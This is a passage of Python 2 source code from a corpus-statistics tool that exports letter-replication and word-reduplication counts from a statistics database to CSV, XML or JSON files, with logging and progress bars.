return False
if syntagma_type == "pos":
if not self._pos_tagger:
if syntagma != "*":
try:
syntagma[0].decode
for word in syntagma:
if word not in Stats._non_pos_tags:
self.logger.error(u"POSGetterError: Additional POS-Tag was found in Syntagma. ('{}') Current CorpusDB contain just default meta tags. ('{}') If you want to search in additional POS, than recompute CorpusDB with POS-Tagger.".format(word,Stats._non_pos_tags))
return False
except:
try:
syntagma[0][0].decode
for syn in syntagma:
for word in syn:
if word not in Stats._non_pos_tags:
self.logger.error(u"POSGetterError: Additional POS-Tag was found in Syntagma. ('{}') Current CorpusDB contain just default meta tags. ('{}') If you want to search in additional POS, than recompute CorpusDB with POS-Tagger.".format(word,Stats._non_pos_tags))
return False
except:
self.logger.error("SyntagmaError: Given Syntagma has incorrect structure.")
return False
#if repl and redu and baseline:
# self.logger.critical("It is not possible to get repls and redus parallel. Please select one option at the same moment.")
# return False
flags = self._get_exporter_flags(repl=repl, redu=redu, baseline=baseline)
if len(flags) == 0:
self.logger.error("No One Phenomena to Export was selected")
return False
if path_to_corpdb:
if not self.attach_corpdb(path_to_corpdb):
self.logger.debug("Given CorpDB '{}' either not exist or not suitable with the current StatsDB.".format(path_to_corpdb))
return False
if not path_to_corpdb and additional_doc_cols:
self.logger.error("Additional Columns from CorpusDB was given, but the path to CorpDB wasn't given. Please give also the path to CorpDB.")
return False
if additional_doc_cols:
if not self.cols_exists_in_corpb(additional_doc_cols):
return False
if output_table_type == "sum":
reptype_sum_table = "repl" if repl else "redu"
else:
reptype_sum_table = False
# p(locals())
#p(max_scope, "max_scope")
header = self._get_header( repl=repl, redu=redu, baseline=True, output_table_type=output_table_type, max_scope=max_scope, additional_doc_cols=additional_doc_cols, context_len_left=context_len_left, context_len_right=context_len_right,word_examples_sum_table=word_examples_sum_table)
if not header:
return False
rows_generator = self._export_generator(header,inp_syntagma=syntagma, reptype_sum_table=reptype_sum_table,
syntagma_type=syntagma_type, sentiment=sentiment, separator_syn=separator_syn,
output_table_type=output_table_type,max_scope=max_scope,
ignore_num=ignore_num,ignore_symbol=ignore_symbol,
word_examples_sum_table=word_examples_sum_table,stemmed_search=stemmed_search)
if not rows_generator:
self.logger.error("RowGenerator is failed.")
return False
if output_table_type == "sum":
ordered_header = header
else:
ordered_header = self.order_header(header, additional_doc_cols,export_file_type)
#p(ordered_header, "ordered_header")
def intern_gen():
# p("111")
for row in rows_generator:
# p("222")
if row:
yield {k:v for k,v in zip(ordered_header,row)}
exporter = Exporter(intern_gen(),rewrite=rewrite,silent_ignore=False )
if export_file_type == "csv":
exporter.tocsv(path_to_export_dir, fname, ordered_header, rows_limit_in_file=rows_limit_in_file)
elif export_file_type == "xml":
exporter.toxml(path_to_export_dir, fname, rows_limit_in_file=rows_limit_in_file, root_elem_name="export", row_elem_name="line")
#elif export_file_type == "sqlite":
# exporter.tosqlite(path_to_export_dir, fname, ordered_header, encryption_key=encryption_key_for_exported_db, table_name="Export")
elif export_file_type == "json":
exporter.tojson(path_to_export_dir, fname, rows_limit_in_file=rows_limit_in_file,)
else:
self.logger.error("'{}'-FileType is not supported..".format(export_file_type))
return False
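# Hypothetical usage sketch (the paths and syntagma are made up; assumes a
# Stats instance with a computed StatsDB):
#   stats.export("/tmp/export_dir", syntagma=["auto"], repl=True, baseline=True,
#                export_file_type="csv", rows_limit_in_file=100000)
# Note that the baseline must be selected for the "exhausted" table type,
# otherwise _get_header_exhausted() refuses to build a header.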
def _get_values_from_doc(self, doc_id, cols_to_get):
if not self.attached_corpdb_name:
self.logger.error("No One CorpDB was attached. To get additional Columns from corpus, you need attach the right CorpDB before.")
return False
#p((doc_id, cols_to_get), c="m")
#p(self.statsdb.getall("documents", columns=cols_to_get, dbname=self.attached_corpdb_name, where="{}={}".format(self._doc_id_tag, doc_id)), c="r")
return self.statsdb.getone("documents", columns=cols_to_get, dbname=self.attached_corpdb_name, where="{}={}".format(self._doc_id_tag, doc_id))
def _export_generator(self,header,inp_syntagma="*", syntagma_type="lexem", sentiment=False,
output_table_type="exhausted", reptype_sum_table=False, separator_syn=" || ",
thread_name="Thread0",ignore_num=False,ignore_symbol=False,
word_examples_sum_table=True,max_scope=False,stemmed_search=False):
if not separator_syn:
self.logger.error("No Separator for Syntagma was selected.")
yield False
return
# p((inp_syntagma, max_scope),c="r")
#p(locals())
def redu_constr(single_redu):
temp_row = []
for table_part in Stats.header_order_to_export:
if table_part == "baseline":
temp_row += current_ordered_baseline_row
#p(temp_row, "temp_row")
elif table_part == "document":
#p(header["document"])
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["document"][0]]
doc_id = single_redu[ix_doc_id_redu]
col_from_corp = header["document"][1]
#p(col_from_corp, "col_from_corp", c="g")
if col_from_corp:
values_from_corp = self._get_values_from_doc(doc_id, col_from_corp)
#p(values_from_corp, "values_from_corp")
if values_from_corp:
temp_row += list(values_from_corp)
else:
self.logger.error("No values from Corpus was returned")
yield False
return
elif table_part == "word":
temp_row += [None if col_name == 'rle_word' else single_redu[ix_redu[col_name]] for col_name in header["word"]]
elif table_part == "repl":
temp_row += [None for col_name in header["repl"]]
elif table_part == "redu":
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["redu"]]
#extracted_redus.append(single_redu[ix_redu_id])
elif table_part == "context":
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["context"]]
#exported_rows_count += 1
#p(temp_row, "2121temp_row",c="m")
#exported_rows_count += 1
yield temp_row
return
# p("!99999")
if output_table_type == "sum":
if reptype_sum_table not in ("repl", "redu"):
self.logger.error("Wrong RepType ('{}') was selected.".format(reptype_sum_table))
yield False
return
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("Exporter (sum)") , "", counter_format=self.status_bars_manager.term.bold_white_on_green("{fill}{desc}{fill}"))
status_bar_start.refresh()
data = self.compute_rep_sum(inp_syntagma, reptype_sum_table, syntagma_type=syntagma_type, sentiment=sentiment,
stemmed_search=stemmed_search, thread_name=thread_name, ignore_num=ignore_num,
ignore_symbol=ignore_symbol, word_examples_sum_table=word_examples_sum_table)
#p(data, "data")
exported_rows_count = 0
if reptype_sum_table == "redu":
tag = "Words"
if self._status_bar:
status_bar_current = self._get_new_status_bar(len(data), "Exporting:", "word")
for word, word_data in dict(sorted(data.items())).items():
if self._status_bar:
status_bar_current.update(incr=1)
for redu_length, occur in dict(sorted(word_data.items())).items():
exported_rows_count += 1
yield (word, redu_length,occur)
#pass
else:
tag = "Letters"
if self._status_bar:
status_bar_current = self._get_new_status_bar(len(data), "Exporting:", "letter")
for letter, letter_data in dict(sorted(data.items())).items():
if self._status_bar:
status_bar_current.update(incr=1)
for NrOfRepl, repl_data in dict(sorted(letter_data.items())).items():
exported_rows_count += 1
occur = repl_data[0]
temp_row = (letter, NrOfRepl, occur)
if word_examples_sum_table:
examples = dict(repl_data[1])
temp_row += (examples, )
yield temp_row
if self._status_bar:
#i += 1
#print status_bar_current.total, i
#if status_bar_current.total != i:
# status_bar_current.total = i
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Exported: {}:'{}'; Rows: '{}'; ".format(tag, status_bar_current.count,exported_rows_count) ), "", counter_format=self.status_bars_manager.term.bold_white_on_green('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
else:
# p("!88888")
if not header:
self.logger.error("Header is empty. Please give non-empty header.")
yield False
return
try:
repl = True if header["repl"] else False
redu = True if header["redu"] else False
baseline = True if header["baseline"] else False
except:
self.logger.error("Header has wrong structure. Please give header with the right structure. Probably was selected not correct 'output_table_type'. ")
yield False
return
#p((header, repl, redu, baseline))
#Stats.header_order_to_export
# p("!7777")
data = self.get_data(inp_syntagma=inp_syntagma,repl=repl, redu=redu, baseline=baseline, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=max_scope, stemmed_search=stemmed_search,send_empty_marker=True,
minimum_columns=False,order_output_by_syntagma_order=False, return_full_tuple=False,delete_duplicates=True,
get_columns_repl=False,get_columns_redu=False,get_columns_baseline=False,if_type_pos_return_lexem_syn=True)
#p(len(data), "dd")
# p((inp_syntagma, repl, redu,baseline, syntagma_type, sentiment, thread_name,max_scope, stemmed_search,), c="r")
if not data:
self.logger.error("Current Generator wasn't initialized. Because No Data was found in the current StatsDB for current settings. Please try to change the settings.")
yield False
return
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("Exporter (exhausted)") , "", counter_format=self.status_bars_manager.term.bold_white_on_green("{fill}{desc}{fill}"))
status_bar_start.refresh()
status_bar_current_all = self._get_new_status_bar(self.statsdb.rownum("baseline"), "All:", "syntagma")
#p(len(data), "dd")
status_bar_current_right = self._get_new_status_bar(len(data), "Qualified:", "syntagma")
status_bar_current_all.refresh()
status_bar_current_right.refresh()
# p("!666")
ix_baseline = self.col_index_orig["baseline"]
ix_repl = self.col_index_orig["repl"]
ix_redu = self.col_index_orig["redu"]
ix_repl_in_redu = ix_repl["in_redu"]
ix_redu_in_redufree = ix_redu["index_in_redufree"]
ix_doc_id_repl = ix_repl["doc_id"]
ix_doc_id_redu = ix_redu["doc_id"]
ix_redu_id = ix_redu["id"]
i = 0
exported_rows_count = 0
# p("!555")
# p(data, "data")
count = 0
for i, item in enumerate(data):
if item == None:
count += 1
# p((i,count))
#p((i, item))
# p(item, "item")
if not item:
if self._status_bar:
status_bar_current_all.update(incr=1)
continue
i += 1
# p("!444")
if self._status_bar:
status_bar_current_all.update(incr=1)
status_bar_current_right.update(incr=1)
#if inp_syntagma == ["klitze, kleine"]:
# p(item, "item")
#p(item , "item")
#temp_rows = []
#### Prepare Baseline
vals_bas = item["baseline"]
if not vals_bas:
self.logger.error("'baseline'-Element is empty. (syntagma: '{}')".format(item["syntagma"]))
yield False
break
#ret
#p(vals_bas, "vals_bas")
#p(header["baseline"],'header["baseline"]')
if len(vals_bas)> 1:
#p(vals_bas, "vals_bas")
self.logger.error( "Baseline Element has more as 1 item. If you searching in 'pos' and you got this error, please select 'if_type_pos_return_lexem_syn'-option to ensure right work. ")
yield False
return
vals_bas = vals_bas[0]
#p(vals_bas,"vals_bas")
#current_ordered_baseline_row = [ " || ".join(vals_bas[ix_baseline[col_name]]) if col_name in ["syntagma", "stemmed"] else vals_bas[ix_baseline[col_name]] for col_name in header["baseline"]]
current_ordered_baseline_row = []
for col_name in header["baseline"]:
if col_name == "syntagma":
current_ordered_baseline_row.append(separator_syn.join(vals_bas[ix_baseline[col_name]]))
elif col_name == "stemmed":
current_ordered_baseline_row.append(separator_syn.join(vals_bas[ix_baseline[col_name]].split(self._baseline_delimiter)))
else:
current_ordered_baseline_row.append(vals_bas[ix_baseline[col_name]])
#p(current_ordered_baseline_row, "current_ordered_baseline_row")
### Prepare Other Data
if repl:
#temp_row = []
vals_repl = item["repl"]
if not vals_repl:
if redu:
vals_redu = item["redu"]
if vals_redu: # if just redus were found, but no repls for the current syntagma, then extract just the redus
for single_redu in vals_redu:
exported_rows_count += 1
yield tuple(redu_constr(single_redu))[0]
#vals_redu_dict = {singl_redu[ix_doc_id_redu]:{} for singl_redu in vals_redu}
#return
if redu:
vals_redu = item["redu"]
vals_redu_dict = defaultdict(lambda:defaultdict(None))
redu_ids = defaultdict(dict)
for singl_redu in vals_redu:
redu_doc_id = singl_redu[ix_doc_id_redu]
redu_index = singl_redu[ix_redu_in_redufree]
redu_ids[singl_redu[ix_redu_id]] = (singl_redu[ix_doc_id_redu], singl_redu[ix_redu_in_redufree])
vals_redu_dict[redu_doc_id][redu_index] = singl_redu
#vals_redu_dict = {singl_redu[ix_doc_id_redu]:{} for singl_redu in vals_redu}
#temp_data = []
extracted_redus= set()
for single_repl in vals_repl:
temp_row = []
#p(single_repl, "single_repl", c="r")
#for
for table_part in Stats.header_order_to_export:
if table_part == "baseline":
temp_row += current_ordered_baseline_row
elif table_part == "document":
#p(header["document"])
temp_row += [single_repl[ix_repl[col_name]] for col_name in header["document"][0]]
doc_id = single_repl[ix_doc_id_repl]
col_from_corp = header["document"][1]
#p(col_from_corp, "col_from_corp", c="g")
if col_from_corp:
values_from_corp = self._get_values_from_doc(doc_id, col_from_corp)
#p(values_from_corp, "values_from_corp")
if values_from_corp:
temp_row += list(values_from_corp)
else:
self.logger.error("No values from Corpus was returned")
yield False
return
elif table_part == "word":
temp_row += [single_repl[ix_repl[col_name]] for col_name in header["word"]]
elif table_part == "repl":
temp_row += [single_repl[ix_repl[col_name]] for col_name in header["repl"]]
elif table_part == "redu":
if redu:
in_redu = single_repl[ix_repl_in_redu]
if in_redu:
if not vals_redu: # if wasn't found - than re-exctract with other flag
current_syntagma = vals_bas[ix_baseline["syntagma"]]
#p((in_redu,single_repl, vals_redu,current_syntagma))
vals_redu = self._get_data_for_one_syntagma(current_syntagma,redu=True, repl=False, baseline=False,get_also_non_full_repetativ_result=True)["redu"]
#p(vals_redu, "22vals_redu")
vals_redu_dict = defaultdict(lambda:defaultdict(None))
for singl_redu in vals_redu:
vals_redu_dict[singl_redu[ix_doc_id_redu]][singl_redu[ix_redu_in_redufree]] = singl_redu
if not vals_redu:
self.logger.error("ImplementationError: No redus was extracted for '{}'-syntagma. ".format(current_syntagma))
yield False
return
repl_doc_id = single_repl[ix_doc_id_repl]
#p((single_repl))
#p(vals_redu_dict[repl_doc_id].keys(), "111redu_ixs")
try:
redu_for_current_repl = vals_redu_dict[repl_doc_id][in_redu]
except KeyError:
current_syntagma = vals_bas[ix_baseline["syntagma"]]
#!!!!!!!p((in_redu,single_repl, vals_redu,current_syntagma))
vals_redu = self._get_data_for_one_syntagma(current_syntagma,redu=True, repl=False, baseline=False,get_also_non_full_repetativ_result=True)["redu"]
#p(vals_redu, "22vals_redu")
vals_redu_dict = defaultdict(lambda:defaultdict(None))
for singl_redu in vals_redu:
vals_redu_dict[singl_redu[ix_doc_id_redu]][singl_redu[ix_redu_in_redufree]] = singl_redu
if not vals_redu:
self.logger.error("ImplementationError: No redus was extracted for '{}'-syntagma. ".format(current_syntagma))
yield False
return
#p((single_repl))
#p(vals_redu_dict[repl_doc_id].keys(), "222redu_ixs")
redu_for_current_repl = vals_redu_dict[repl_doc_id][in_redu]
if not redu_for_current_repl: # if wasn't found - than re-exctract with other flag
self.logger.error("DB-Inconsistence or ImplementationError: For Current Repl ('{}') in Redu ('{}') wasn't found any redu in the StatsDB.".format(single_repl, in_redu))
yield False
return
temp_row += [redu_for_current_repl[ix_redu[col_name]] for col_name in header["redu"]]
extracted_redus.add(redu_for_current_repl[ix_redu_id])
else:
temp_row += [None for col_name in header["redu"]]
elif table_part == "context":
temp_row += [single_repl[ix_repl[col_name]] for col_name in header["context"]]
exported_rows_count += 1
#p(temp_row, "temp_row")
yield temp_row
## for redus, which still be not extracted
if redu:
for r_id, data in redu_ids.items():
if r_id not in extracted_redus:
redu_to_extract = vals_redu_dict[data[0]][data[1]]
exported_rows_count += 1
#p(tuple(redu_constr(redu_to_extract))[0], c="r")
yield tuple(redu_constr(redu_to_extract))[0]
elif not repl and redu:
temp_row = []
vals_redu = item["redu"]
if not vals_redu:
self.logger.error("'redu'-Element is empty. (syntagma: '{}')".format(item["syntagma"]))
yield False
#return
for single_redu in vals_redu:
temp_row = []
for table_part in Stats.header_order_to_export:
if table_part == "baseline":
temp_row += current_ordered_baseline_row
elif table_part == "document":
#p(header["document"])
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["document"][0]]
col_from_corp = header["document"][1]
doc_id = single_redu[ix_doc_id_redu]
if col_from_corp:
values_from_corp = self._get_values_from_doc(doc_id, col_from_corp)
if values_from_corp:
temp_row += list(values_from_corp)
else:
self.logger.error("No values from Corpus was returned")
yield False
return
elif table_part == "word":
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["word"]]
elif table_part == "redu":
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["redu"]]
elif table_part == "context":
temp_row += [single_redu[ix_redu[col_name]] for col_name in header["context"]]
exported_rows_count += 1
yield temp_row
elif not redu and not repl:
self.logger.error("No one Phanomena was selected. Please select Redu or Repls to export.")
yield False
return
if self._status_bar:
# i += 1
# print status_bar_current_right.total, count, i
# if status_bar_current_right.total != count:
# status_bar_current_right.total = i
# status_bar_current_right.refresh()
#p((status_bar_current_all.total, status_bar_current_all.count))
if status_bar_current_all.total != status_bar_current_all.count:
status_bar_current_all.count = status_bar_current_all.total #= status_bar_current_all.count
status_bar_current_all.refresh()
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Exported: Syntagmas:'{}'; Rows: '{}'; ".format(status_bar_current_right.count,exported_rows_count) ), "", counter_format=self.status_bars_manager.term.bold_white_on_green('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
#p(i, "i")
if i == 0:
self.logger.critical("No Data was found for current settings. Please try to change the settings.")
yield False
return
def _check_exist_columns_to_get(self, get_columns_repl, get_columns_redu,get_columns_baseline):
status = True
if get_columns_repl:
columns_from_db = self.statsdb.col("replications")
for col in get_columns_repl:
if col not in columns_from_db:
self.logger.error("'{}'-column is not exist in 'replications'-Table. ".format(col) )
status = False
if get_columns_redu:
columns_from_db = self.statsdb.col("reduplications")
for col in get_columns_redu:
if col not in columns_from_db:
self.logger.error("'{}'-column is not exist in 'reduplications'-Table. ".format(col) )
status = False
if get_columns_baseline:
columns_from_db = self.statsdb.col("baseline")
for col in get_columns_baseline:
if col not in columns_from_db:
self.logger.error("'{}'-column is not exist in 'baseline'-Table. ".format(col) )
status = False
return status
def _convert_cols_to_indexes(self, get_columns_repl,get_columns_redu,get_columns_baseline,indexes):
indexes_to_get_repl = []
indexes_to_get_redu = []
indexes_to_get_baseline = []
if get_columns_repl:
ix = indexes["repl"]
for col in get_columns_repl:
indexes_to_get_repl.append(ix[col])
if get_columns_redu:
ix = indexes["redu"]
for col in get_columns_redu:
indexes_to_get_redu.append(ix[col])
if get_columns_baseline:
ix = indexes["baseline"]
for col in get_columns_baseline:
indexes_to_get_baseline.append(ix[col])
return indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline
#return ""
def _extract_certain_columns(self,data, indexes_to_get_repl,indexes_to_get_redu,indexes_to_get_baseline):
#pass
#indexes = self.col_index_min if minimum_columns else self.col_index_orig
if indexes_to_get_repl:
repls = data["repl"]
if repls:
new_repls = []
for repl in repls:
new_repls.append([repl[i] for i in indexes_to_get_repl])
data["repl"] = new_repls
if indexes_to_get_redu:
redus = data["redu"]
if redus:
new_redus = []
for redu in redus:
new_redus.append([redu[i] for i in indexes_to_get_redu])
data["redu"] = new_redus
if indexes_to_get_baseline:
baseline = data["baseline"]
if baseline:
new_baseline = []
for b in baseline:
new_baseline.append([b[i] for i in indexes_to_get_baseline])
data["baseline"] = new_baseline
return data
def compute_rep_sum(self,syntagma_to_search, reptype, syntagma_type="lexem",sentiment=False,
stemmed_search=False, thread_name="Thread0", ignore_num=False,ignore_symbol=False, word_examples_sum_table=True):
max_scope = 1
if reptype == "repl":
repl = True
redu = False
else:
repl = False
redu = True
num = self._get_row_num_in_baseline_with_rep(redu=redu, repl=repl, max_scope=max_scope)
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_current = self._get_new_status_bar(num, "Summarizing:", "syntagma")
#minimum_columns = True
if reptype == "repl":
collected_repls_from_corp = defaultdict(lambda:defaultdict(lambda: [[],None]))
get_columns_repl = ("doc_id","index_in_corpus","repl_letter", "repl_length", "rle_word", "pos")
### Step 1: Collect Data From Corpus
i = 0
for item in self.get_data(syntagma_to_search, repl=True, redu=False, baseline=False, get_columns_repl=get_columns_repl,
max_scope=max_scope,sentiment=sentiment,syntagma_type=syntagma_type,
stemmed_search=stemmed_search):
if self._status_bar:
status_bar_current.update(incr=1)
i+= 1
#p(item, "item")
#repls = item["repl"]
for repl in item["repl"]:
if ignore_num:
if repl[5] == "number":
continue
if ignore_symbol:
if repl[5] == "symbol":
continue
#p(repl, "repl")
collected_repls_from_corp[repl[0]][repl[1]][0].append((repl[2], repl[3]))
if word_examples_sum_table:
collected_repls_from_corp[repl[0]][repl[1]][1] = repl[4]
### Step 1: Compute Summ
if word_examples_sum_table:
summery = defaultdict(lambda:defaultdict(lambda:[0,defaultdict(lambda: 0) ]))
else:
summery = defaultdict(lambda:defaultdict(lambda:[0]))
for doc_id, doc_data in collected_repls_from_corp.iteritems():
for index_in_corpus , repl_container in doc_data.iteritems():
for repl in repl_container[0]:
#p(repl, "repl")
summery[repl[0]][repl[1]][0] += 1
if word_examples_sum_table:
summery[repl[0]][repl[1]][1][repl_container[1]] += 1
#p(word_examples_sum_table, "word_examples_sum_table")
if self._status_bar:
if status_bar_current.total != i:
#raise Exception, "PREDICED LEN IS NOT CORRECT IN SUM COMPUTER"
status_bar_current.total = i
if i == 0:
self.logger.error("('{}'-sum) Nothing was extracted for '{}'-syntagma. No Data was found for given settings.".format(reptype,syntagma_to_search))
return summery
else:
get_columns_redu = (db_helper.tag_normalized_word,"redu_length", "pos")
collected_redus_from_corp = defaultdict(lambda: defaultdict(lambda:0))
i = 0
#p((syntagma_to_search,max_scope, sentiment, syntagma_type, stemmed_search))
for item in self.get_data(syntagma_to_search, redu=True, repl=False, baseline=False, get_columns_redu=get_columns_redu, max_scope=max_scope,
sentiment=sentiment,syntagma_type=syntagma_type,stemmed_search=stemmed_search):
#p(item,"item")
i += 1
if self._status_bar:
status_bar_current.update(incr=1)
for redu in item["redu"]:
if ignore_num:
if redu[3] == "number":
continue
if ignore_symbol:
if redu[3] == "symbol":
continue
#p(redu)
collected_redus_from_corp[redu[0]][redu[1]] += 1
if self._status_bar:
if status_bar_current.total != i:
#raise Exception, "PREDICED LEN IS NOT CORRECT IN SUM COMPUTER"
status_bar_current.total = i
if i == 0:
self.logger.error("('{}'-sum) Nothing was extracted for '{}'-syntagma. No Data was found for given settings.".format(reptype,syntagma_to_search))
return collected_redus_from_corp
#p(collected_redus_from_corp, "collected_redus_from_corp")
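# Sketch of the returned structures (inferred from the code above):
#   reptype == "repl" -> summery[letter][NrOfRepl] = [occurrences, {rle_word: count}]
#                        (the examples dict is only filled if word_examples_sum_table)
#   reptype == "redu" -> collected_redus_from_corp[word][redu_length] = occurrences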
def _get_row_num_in_baseline_with_rep(self, redu=False, repl=False, max_scope=False):
#p((redu, repl, max_scope))
if repl or redu:
rep_w_list = []
if repl:
w_repl = " occur_repl_uniq IS NOT NULL "
if self._full_repetativ_syntagma:
w_repl = "({} AND occur_full_syn_repl IS NOT NULL )".format(w_repl )
rep_w_list.append(w_repl)
if redu:
w_redu = " occur_redu_uniq IS NOT NULL "
if self._full_repetativ_syntagma:
w_redu = "({} AND occur_full_syn_redu IS NOT NULL )".format(w_redu)
rep_w_list.append(w_redu)
#if redu: rep_w_list.append(" occur_redu_uniq IS NOT NULL ")
where_str = "OR".join(rep_w_list)
where_str = "({})".format(where_str) if len(rep_w_list)>1 else where_str
if max_scope: where_str += " AND scope<={} ".format(max_scope)
where_str = where_str if where_str else False
#p(where_str,"where_str")
num= self.statsdb.rownum("baseline", where=where_str,connector_where="OR")
else:
num = 0
return num
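# Illustrative WHERE clause (an assumption about the concrete SQL text, assembled
# from the snippets above): with repl=True, redu=True, _full_repetativ_syntagma
# and max_scope=1 the counted rows would match roughly
#   (( occur_repl_uniq IS NOT NULL AND occur_full_syn_repl IS NOT NULL )
#    OR ( occur_redu_uniq IS NOT NULL AND occur_full_syn_redu IS NOT NULL ))
#    AND scope<=1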
def get_data(self,inp_syntagma="*",repl=False, redu=False, baseline=False, syntagma_type="lexem",
sentiment=False,thread_name="Thread0", max_scope=False, stemmed_search=False,send_empty_marker=False,
minimum_columns=False,order_output_by_syntagma_order=False, return_full_tuple=False,delete_duplicates=True,
get_columns_repl=False,get_columns_redu=False,get_columns_baseline=False,
if_type_pos_return_lexem_syn=False):
#p(inp_syntagma, "0inp_syntagma")
# p((inp_syntagma,repl,redu,baseline))
# p("..9999")
#p(locals())
if inp_syntagma == "*":
#p("..888")
return self._get_data(inp_syntagma=inp_syntagma,repl=repl, redu=redu, baseline=baseline, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=max_scope, stemmed_search=stemmed_search,
minimum_columns=minimum_columns,order_output_by_syntagma_order=order_output_by_syntagma_order,send_empty_marker=send_empty_marker,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates, if_type_pos_return_lexem_syn=if_type_pos_return_lexem_syn,
get_columns_repl=get_columns_repl,get_columns_redu=get_columns_redu,get_columns_baseline=get_columns_baseline)
else:
if thread_name not in self.preprocessors:
if not self._init_preprocessors(thread_name=thread_name):
self.logger.error("Error during Preprocessors initialization. Thread '{}' was stopped.".format(thread_name), exc_info=self._logger_traceback)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":"Error during Preprocessors initialization"})
self._terminated.value = True
return False
# p("..7777")
try:
inp_syntagma[0].decode # if iterator with just one syntagma
extract_type = 1
except AttributeError:
try:
inp_syntagma[0][0].decode #if iterator with just many different syntagma
extract_type = 2
except AttributeError as e:
self.logger.error("Given Syntagma '{}' has not correct format. Exception: '{}'.".format(inp_syntagma, repr(e)))
return False
except Exception as e:
self.logger.error(" Exception was throw: '{}'.".format( repr(e)))
return False
# p("..666")
if extract_type == 1:
#p("..555")
#p(inp_syntagma, "999999inp_syntagma")
gen = self._get_data(inp_syntagma=inp_syntagma,repl=repl, redu=redu, baseline=baseline, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=max_scope, stemmed_search=stemmed_search,
minimum_columns=minimum_columns,order_output_by_syntagma_order=order_output_by_syntagma_order,send_empty_marker=send_empty_marker,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates,if_type_pos_return_lexem_syn=if_type_pos_return_lexem_syn,
get_columns_repl=get_columns_repl,get_columns_redu=get_columns_redu,get_columns_baseline=get_columns_baseline)
#p(len(gen), "num")
if not gen:
self.logger.error("Current Generator wasn't created")
return False
return gen
else:
#p("..444")
generators = []
#p(inp_syntagma, "1999999inp_syntagma")
#p(inp_syntagma, "2inp_syntagma")
not_init_gens = -1
for counter, inp_syn in enumerate(inp_syntagma):
gen = self._get_data(inp_syntagma=inp_syn,repl=repl, redu=redu, baseline=baseline, syntagma_type=syntagma_type,
sentiment=sentiment,thread_name=thread_name, max_scope=max_scope, stemmed_search=stemmed_search,send_empty_marker=send_empty_marker,
minimum_columns=minimum_columns,order_output_by_syntagma_order=order_output_by_syntagma_order,
return_full_tuple=return_full_tuple,delete_duplicates=delete_duplicates, if_type_pos_return_lexem_syn=if_type_pos_return_lexem_syn,
get_columns_repl=get_columns_repl,get_columns_redu=get_columns_redu,get_columns_baseline=get_columns_baseline)
if not gen:
not_init_gens += 1
else:
#self.logger.error("Current Generator wasn't created")
#return False
generators.append(gen)
if counter == not_init_gens:
#p(not_init_gens)
self.logger.error("Not one generator was created!")
return False
#p(generators, "generators")
# p("..333")
num = sum([len(gen) for gen in generators])
#p(num, "num")
def intern_gen():
# p("..222")
for gen in generators:
if not gen:
yield False
return
for item in gen:
yield item
return LenGen(intern_gen(), num)
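# Hypothetical usage sketch (the syntagma is made up): get_data() returns a
# LenGen, i.e. a length-aware generator of per-syntagma dicts:
#   for item in stats.get_data(["klitze", "kleine"], repl=True, baseline=True):
#       item["syntagma"], item["repl"], item["baseline"]   # per-syntagma results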
def _lexem_syn_extractor_from_pos(self, inp_syntagma, inpdata, repl=False, redu=False, baseline=False,
sentiment=False, minimum_columns=False,order_output_by_syntagma_order=False,
return_full_tuple=False,delete_duplicates=True,#send_empty_marker=False,
get_columns_repl=False,get_columns_redu=False,get_columns_baseline=False):
max_scope=False
stemmed_search=False
inpdata = list(inpdata)
if len(inpdata) > 1:
self.logger.error("The Length of given generator is more as 1.")
return False
elif len(inpdata) == 0:
self.logger.error("The Length of given generator is 0.")
return False
inpdata = inpdata[0]
if not inpdata:
return False
syn_len = len(inp_syntagma)
exctracted_baseline = [b for b in inpdata["baseline"] if len(b[0])==syn_len]
def intern_gen():
already_exported_syntagma = set()
for b in exctracted_baseline:
lexem_syn = b[0]
#p(lexem_syn, "1111lexem_syn", c="r")
data = self._get_data_for_one_syntagma(lexem_syn, repl=repl, redu=redu, baseline=baseline, syntagma_type="lexem", additional_pos_where=inp_syntagma,
sentiment=sentiment, max_scope=False,
for_optimization=False, stemmed_search=False, get_also_non_full_repetativ_result=False,
order_output_by_syntagma_order=order_output_by_syntagma_order, return_full_tuple=return_full_tuple,
minimum_columns=minimum_columns, delete_duplicates=delete_duplicates,)
#p(data,">>>>data", c="c")
s = tuple(data["syntagma"])
if s in already_exported_syntagma:
continue
else:
already_exported_syntagma.add(s)
yield data
return LenGen(intern_gen(), len(exctracted_baseline))
def _get_data(self,inp_syntagma="*",repl=False, redu=False, baseline=False, syntagma_type="lexem",
sentiment=False,thread_name="Thread0", max_scope=False, stemmed_search=False, send_empty_marker=False,
minimum_columns=False,order_output_by_syntagma_order=False, return_full_tuple=False,delete_duplicates=True,
get_columns_repl=False,get_columns_redu=False,get_columns_baseline=False,if_type_pos_return_lexem_syn=False):
#print "111"
# p("---9999")
#p(inp_syntagma, "11inp_syntagma")
if not self._check_stats_db_should_exist():
return False
#if not isinstance(inp_syntagma, (list,tuple))
if syntagma_type not in Stats.supported_syntagma_type:
